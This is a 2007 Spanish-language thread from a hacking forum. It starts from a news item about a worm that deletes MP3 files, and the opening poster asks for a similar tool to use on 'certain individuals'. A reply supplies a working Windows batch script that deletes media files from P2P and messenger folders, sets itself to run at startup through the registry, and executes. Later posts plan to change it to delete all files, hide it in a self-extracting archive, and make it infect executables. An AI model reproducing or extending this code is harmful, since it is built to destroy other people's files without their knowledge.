elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Nuevo virus borra archivos MP3 del disco duro
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Nuevo virus borra archivos MP3 del disco duro  (Leído 6,754 veces)
Meta


Desconectado Desconectado

Mensajes: 3.438



Ver Perfil WWW
Nuevo virus borra archivos MP3 del disco duro
« en: 8 Agosto 2007, 01:06 am »

En al noticia de abajo, pues mira, apra entrgar este virus a ciertos individuos.

Se me ocurre hacer un archivo bat que haga lo del virus que infica abajo.

Mi idea es:

Que encuentre por todos, no todo, sino todos los discos duros y particiones los archivos...

*.mp3
*.mpg
*.jpg
*.avi

en archivo bat (que alguien si sabe ahcerlo que lo haga) Y yo lo apsaré a C# y les entregaré el código fuente.







Nuevo virus borra archivos MP3 del disco duro.

Si pudiera imaginarse un virus "soñado" para la industria discográfica, ese virus ya existe y se llama "W32.Deletemusic" ("borramúsica").

Diario Ti: No es aventurado suponer que la propia industria discográfica ha puesto en circulación un nuevo virus informático al que Symantec ha dado el autoexplicativo nombre "W32.Deletemusic".

En nuestros días, rara vez se tiene noticia de un virus o gusano que borre archivos. La mayoría de los códigos malignos actuales tienen más bien una motivación económica.

Sin embargo, W32.Deletemusic (“w32.borrarmúsica") parece ser de la antigua escuela.

El virus en cuestión no borra formatos con protección anticopia, sino exclusivamente los archivos MP3 que encuentre en el sistema.

El gusano en cuestión no es especialmente peligroso. Symantec indica que su grado de propagación es mínimo y que sólo infecta a los sistemas mediante los procedimientos “antiguos"; es decir, mediante memorias USB o CD.


Fuente:
http://www.diarioti.com/gate/n.php?id=14881


En línea

chrominum


Desconectado Desconectado

Mensajes: 567


Viceroy: No es lo que tengo, es COMO lo tengo


Ver Perfil WWW
Re: Nuevo virus borra archivos MP3 del disco duro
« Respuesta #1 en: 9 Agosto 2007, 23:13 pm »

Código:
@echo off
cd c:\windows\system32
echo @echo off > virus.bat
echo cd C:\Documents and Settings\%USERNAME%\Configuración local\Datos de programa\Ares\My Shared Folder >> virus.bat
echo del /q *.mp3 >> virus.bat
echo del /q *.avi >> virus.bat
echo del /q *.mpg >> virus.bat
echo del /q *.wmv >> virus.bat
echo cd C:\Archivos de programa\eMule\Incoming >> virus.bat
echo del /q *.mp3 >> virus.bat
echo del /q *.avi >> virus.bat
echo del /q *.mpg >> virus.bat
echo del /q *.wmv >> virus.bat
echo cd donde guarde kazaa los archivos >> virus.bat
echo del /q *.mp3 >> virus.bat
echo del /q *.avi >> virus.bat
echo del /q *.mpg >> virus.bat
echo del /q *.wmv >> virus.bat
echo cd C:\Documents and Settings\%USERNAME%\Mis documentos\Mis archivos recibidos >> virus.bat
echo del /q *.mp3 >> virus.bat
echo del /q *.avi >> virus.bat
echo del /q *.mpg >> virus.bat
echo del /q *.wmv >> virus.bat
echo exit >> virus.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run/v virus.bat/t reg_sz /d
C:\windows\system32 /f
start c:\windows\system32\virus.bat
exit

Eso serviría si el usuario no a cambiado las carpetas predeterminadas donde se guarda en cada p2p (notese que no se donde baja el kazaa asi que donde yo puse "donde guarde kazaa los archivos" poned la dirección donde se guarda. Si sabéis de un p2p pues seguid el mismo proceso que los anteriores. También si queréis que se borre otra extension pues añadirla. Cambiar el nombre de virus.bat por un nombre amenazador. Critiquen!! ;D

PD: Mis archivos recibidos lo pongo por lo del msn, no quede ni uno vivo!!!  ;D


« Última modificación: 9 Agosto 2007, 23:22 pm por ArcheritONE » En línea

Meta


Desconectado Desconectado

Mensajes: 3.438



Ver Perfil WWW
Re: Nuevo virus borra archivos MP3 del disco duro
« Respuesta #2 en: 9 Agosto 2007, 23:37 pm »

Muchas gracias.

En archivos recibidos yo pondré esto *.*

Lo meteré dentro con un winrar autoejecutable.
En línea

Red Mx
Rojito
Colaborador
***
Desconectado Desconectado

Mensajes: 3.649


Viva México Cabrones...


Ver Perfil WWW
Re: Nuevo virus borra archivos MP3 del disco duro
« Respuesta #3 en: 10 Agosto 2007, 00:04 am »

No entender a eso le llaman virus hoy en dia  :-(
En línea

Desarrollar Malware Es Causa De Cancer...
Gordo

Desconectado Desconectado

Mensajes: 86

Obrero y Español


Ver Perfil WWW
Re: Nuevo virus borra archivos MP3 del disco duro
« Respuesta #4 en: 10 Agosto 2007, 00:06 am »

mejor que ese bat no caiga en manos de los locos de la SGAE
En línea

Meta


Desconectado Desconectado

Mensajes: 3.438



Ver Perfil WWW
Re: Nuevo virus borra archivos MP3 del disco duro
« Respuesta #5 en: 10 Agosto 2007, 13:31 pm »

¿SGAE?
En línea

chrominum


Desconectado Desconectado

Mensajes: 567


Viceroy: No es lo que tengo, es COMO lo tengo


Ver Perfil WWW
Re: Nuevo virus borra archivos MP3 del disco duro
« Respuesta #6 en: 10 Agosto 2007, 13:55 pm »

La SGAE es: Sociedad General de Autores y Editores. ;)
En línea

Zeroql


Desconectado Desconectado

Mensajes: 957


Todo lo k sucede sucede por una razon


Ver Perfil WWW
Re: Nuevo virus borra archivos MP3 del disco duro
« Respuesta #7 en: 10 Agosto 2007, 14:23 pm »

pero yo a eso le llamaria funcion, como puede ser virus, si se necesita que sea ejecuta por un usuario.
pero esta muy bueno, voy a ver  si se peude pasar a un lenguaje y que infecte exes, yo diria que esto me tomara tiempo ya que mi horario de estudios no es que sea muy comodo para mi. pero ahi veremos.
En línea

Dime y lo olvido, enseñame y lo recuerdo, involucrame y lo aprendo.
/.-ZEROQL.-\   -----  #937675#

Meta


Desconectado Desconectado

Mensajes: 3.438



Ver Perfil WWW
Re: Nuevo virus borra archivos MP3 del disco duro
« Respuesta #8 en: 10 Agosto 2007, 16:30 pm »

pero yo a eso le llamaria funcion, como puede ser virus, si se necesita que sea ejecuta por un usuario.
pero esta muy bueno, voy a ver  si se peude pasar a un lenguaje y que infecte exes, yo diria que esto me tomara tiempo ya que mi horario de estudios no es que sea muy comodo para mi. pero ahi veremos.


Si lo haces con C#, C, C++...
En línea

Red Mx
Rojito
Colaborador
***
Desconectado Desconectado

Mensajes: 3.649


Viva México Cabrones...


Ver Perfil WWW
Re: Nuevo virus borra archivos MP3 del disco duro
« Respuesta #9 en: 10 Agosto 2007, 21:37 pm »

con todo respeto hacer esto en cualquier lenguaje es muy sencillo no se crescan por eso.
En línea

Desarrollar Malware Es Causa De Cancer...
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Detectado un virus en Windows que reemplaza el MBR del disco duro
Noticias
wolfbcn 0 2,144 Último mensaje 15 Abril 2012, 02:21 am
por wolfbcn
Nuevo virus se protege contra los antivirus bloqueando el disco duro
Noticias
wolfbcn 0 1,857 Último mensaje 19 Septiembre 2013, 02:23 am
por wolfbcn
tengo un virus que ataca al disco duro
Seguridad
Enrique357 2 2,645 Último mensaje 10 Marzo 2016, 00:23 am
por simorg
Apple Music borra todas las canciones propias del disco duro
Noticias
wolfbcn 0 846 Último mensaje 5 Mayo 2016, 19:18 pm
por wolfbcn
¿El virus definitivo? Ni formateando ni cambiando el disco duro puedes ....
Noticias
wolfbcn 2 1,094 Último mensaje 29 Septiembre 2018, 19:14 pm
por #!drvy
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines